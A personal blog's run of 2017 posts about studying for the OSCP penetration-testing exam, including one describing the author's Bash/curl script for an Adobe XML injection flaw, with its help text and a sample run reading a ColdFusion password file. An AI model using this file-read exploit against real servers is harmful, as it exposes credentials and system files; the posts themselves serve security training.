2017-04-27 22:19:00
This morning my lab time for the PWK studies expired. I tied a ribbon around the lab report and I'm done! In just a week's time the lab penetration test report grew from 67 pages to 101! In total, I've cracked 18 of the 50+ servers and I'd made good progress on number 19. Not even halfway through the labs, but heck! I've learned SO much! I'm looking forward to Tuesday, even knowing up front that I will not pass. It's gonna be such a great experience! /o/View or add comments (curr. 0)
2017-04-19 16:21:00
Way back in the nineties, my brother played Uplink pretty extensively. It was a great game for the time :) Now there's a new, indie hacking game called Hacknet! Seems like a worthy successor!
Ahh yes, running "Scan", "Porthack" and "SSHCrack 22" should suffice in any pen-testing situation! :)
kilala.nl tags: gaming,
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2017-04-19 14:40:00
I sincerely doubt that I'm ready to pass the OSCP exam, but my first attempt is scheduled for May 2nd. My lab time's coming to a close in little over a week and so far I have fully exploited twelve systems and I've learned a tremendous amount of new things. It's been a wonderful experience!
In preparation for the exam, I have finally completed two reports for bonus points:
I've done my best to make the reports fit to my usual standards of documentation, so I'm pretty darn proud of the results!
Let's see how things go in a week or two. I'll learn a lot during my first exam and after that I'll probably book more lab time.
kilala.nl tags: work, sysadmin, ctf,
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2017-04-07 21:35:00
Today I spent a few hours learning how to manually perform the actions that one would otherwise do with Metasploit's "auxiliary:scanner:adobe_xml_inject".
I built a standalone Bash script that uses Curl to submit the XML file to the vulnerable Adobe service(s), so the desired files can be read. Basically, it’s the Bash implementation of Exploit-DB’s multiple/dos/11529.txt (which is a PoC / paper).
I've submitted this script to Offensive Security and I hope they'll consider adding it to their collection! The script is currently available from my GitHub repository -> adobe_xml_inject.sh
I'm darn happy with how the script turned out! I couldn't have made it this quickly without the valuable experience I've built at $PREVCLIENT, using Curl to work with the Nexpose and PingFederate APIs.
EDIT: And it's up on Exploit-DB!
Here's a little show of what the script does!
root@kali:~/Documents/exploits# ./adobe_xml_inject.sh -? adobe_xml_inject.sh [-?] [-d] [-s] [-b] -h host [-p port] [-f file] -? Show this help message. -d Debug mode, outputs more kruft on stdout. -s Use SSL / HTTPS, instead of HTTP. -b Break on the first valid answer found. -h Target host -p Target port, defaults to 8400. -f Full path to file to grab, defaults to /etc/passwd. This script exploits a known vulnerability in a set of Adobe applications. Using one of a few possible URLs on the target host (-h) we attempt to read a file (-f) that is normally inaccessible. NOTE: Windows paths use \, so be sure to properly escape them when using -f! For example: adobe_xml_inject.sh -h -f c:\\coldfusion8\\lib\\password.properties adobe_xml_inject.sh -h -f 'c:\coldfusion8\lib\password.properties' This script relies on CURL, so please have it in your PATH. root@kali:~/Documents/exploits# ./adobe_xml_inject.sh -h -p 80 -f 'c:\coldfusion8\lib\password.properties' INFO 200 for INFO 200 for Read from <?xml version="1.0" encoding="utf-8"?> <amfx ver="3"><header name="AppendToGatewayUrl"><string>;jsessionid=f030d168c640a7d02d4036a3d3b7e4c35783</string></header> <body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits> <string>timestamp</string><string>headers</string><string>body</string> <string>correlationId</string><string>messageId</string><string>timeToLive</string> <string>clientId</string><string>destination</string></traits> <double>1.491574892476E12</double><object><traits><string>DSId</string> </traits><string>DCB6C381-FC19-7475-FC8F-9620278E2A14</string></object><null/> <string>#Fri Sep 23 18:27:15 PDT 2011 rdspassword=< redacted > password=< redacted > encrypted=true </string><string>DCB6C381-FC3E-1604-E33B-88C663AAA33F</string> <double>0.0</double><string>DCB6C381-FC2E-68D8-986E-BD28CQEDABD7</string> <null/></object></body></amfx>"200" INFO 500 for INFO 200 for INFO 500 for INFO 500 for INFO 404 for INFO 404 for INFO 404 for INFO 404 for INFO 404 for INFO 404 for INFO 404 for INFO 404 for INFO 404 for INFO 404 for
kilala.nl tags: work, ctf, sysadmin,
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All content, with exception of "borrowed" blogpost images, or unless otherwise indicated, is copyright of Tess Sluijter. The character Kilala the cat-demon is copyright of Rumiko Takahashi and used here without permission.